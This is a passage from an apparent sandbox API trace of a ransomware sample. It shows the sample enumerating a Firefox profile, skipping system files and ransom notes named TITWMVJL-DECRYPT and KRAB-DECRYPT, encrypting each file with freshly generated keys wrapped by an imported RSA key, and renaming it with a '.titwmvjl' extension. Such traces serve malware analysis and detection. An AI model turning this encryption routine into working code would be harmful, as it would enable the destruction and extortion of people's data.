(lpString1="webappsstore.sqlite", lpString2="Bootfont.bin") returned 1 [0085.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite") returned 99 [0085.144] lstrlenW (lpString=".sqlite") returned 7 [0085.144] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.145] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0085.145] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.145] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.146] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0085.148] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.148] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0085.151] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.152] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.154] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.155] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.155] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.155] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0085.155] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.155] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.156] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.156] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.156] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.161] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.162] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.162] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.162] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0085.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.163] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.163] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.163] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.167] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503378) returned 1 [0085.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.167] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.168] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.168] GetLastError () returned 0x0 [0085.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.169] CryptDestroyKey (hKey=0x503378) returned 1 [0085.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.169] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.169] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.174] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503378) returned 1 [0085.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.175] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.176] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.176] GetLastError () returned 0x0 [0085.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.177] CryptDestroyKey (hKey=0x503378) returned 1 [0085.177] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.177] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.177] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.177] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.178] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x18000, lpOverlapped=0x0) returned 1 [0085.231] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffe8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.231] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x18000, lpOverlapped=0x0) returned 1 [0085.242] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.242] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0085.248] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.256] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.257] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.257] CloseHandle (hObject=0x2d4) returned 1 [0085.261] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\webappsstore.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0085.263] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.264] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0085.264] lstrcmpW (lpString1="xulstore.json", lpString2=".") returned 1 [0085.264] lstrcmpW (lpString1="xulstore.json", lpString2="..") returned 1 [0085.264] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="xulstore.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json" [0085.264] lstrlenW (lpString=".titwmvjl") returned 9 [0085.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.264] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.265] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json.titwmvjl") returned 102 [0085.265] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.265] lstrlenW (lpString=".json") returned 5 [0085.265] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.265] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".json ") returned 6 [0085.265] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0085.266] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="desktop.ini") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="autorun.inf") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="ntuser.dat") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="iconcache.db") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="bootsect.bak") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="boot.ini") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="ntuser.dat.log") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="thumbs.db") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="KRAB-DECRYPT.html") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="CRAB-DECRYPT.html") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="ntldr") returned 1 [0085.266] lstrcmpiW (lpString1="xulstore.json", lpString2="NTDETECT.COM") returned 1 [0085.267] lstrcmpiW (lpString1="xulstore.json", lpString2="Bootfont.bin") returned 1 [0085.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json") returned 93 [0085.267] lstrlenW (lpString=".json") returned 5 [0085.267] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.267] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".json ") returned 6 [0085.267] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.268] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.268] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\xulstore.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0085.270] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.270] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0085.285] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.286] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.289] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.290] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.290] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.290] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0085.290] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.290] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.291] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.292] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0085.294] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.295] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.295] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.295] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0085.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.295] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.295] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.296] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.299] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503438) returned 1 [0085.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.299] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.299] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.300] GetLastError () returned 0x0 [0085.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.301] CryptDestroyKey (hKey=0x503438) returned 1 [0085.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.301] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.301] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0085.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.304] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503638) returned 1 [0085.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.304] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0085.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.305] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0085.305] GetLastError () returned 0x0 [0085.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.305] CryptDestroyKey (hKey=0x503638) returned 1 [0085.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.306] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.306] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.306] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.319] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x333, lpOverlapped=0x0) returned 1 [0085.347] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.347] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x333, lpOverlapped=0x0) returned 1 [0085.350] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.350] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0085.353] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.360] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.360] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.361] CloseHandle (hObject=0x2d4) returned 1 [0085.362] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\xulstore.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\xulstore.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\xulstore.json.titwmvjl"), dwFlags=0x1) returned 1 [0085.364] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.364] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0085.364] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0085.365] CloseHandle (hObject=0x2cc) returned 1 [0085.365] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0085.365] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0085.365] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0085.366] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a09d2ca4deb61a.lock" [0085.366] lstrlenW (lpString=".titwmvjl") returned 9 [0085.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a09d2ca4deb61a.lock") returned 87 [0085.366] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.366] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 96 [0085.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\d2ca4a09d2ca4deb61a.lock") returned 87 [0085.366] lstrlenW (lpString=".lock") returned 5 [0085.366] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.366] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0085.366] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.367] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.367] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0085.367] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0085.367] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0085.367] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\TITWMVJL-DECRYPT.txt" [0085.367] lstrlenW (lpString=".titwmvjl") returned 9 [0085.367] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\TITWMVJL-DECRYPT.txt") returned 83 [0085.367] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.367] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 92 [0085.368] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\TITWMVJL-DECRYPT.txt") returned 83 [0085.368] lstrlenW (lpString=".txt") returned 4 [0085.368] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.368] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0085.368] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0085.368] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.368] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\TITWMVJL-DECRYPT.txt") returned 83 [0085.368] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\TITWMVJL-DECRYPT.txt") returned 83 [0085.368] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.369] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.369] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0085.369] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.369] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.369] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.369] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0085.369] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0085.369] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.371] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0085.371] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0085.373] CloseHandle (hObject=0x2c4) returned 1 [0085.374] FindNextFileW (in: hFindFile=0x503478, 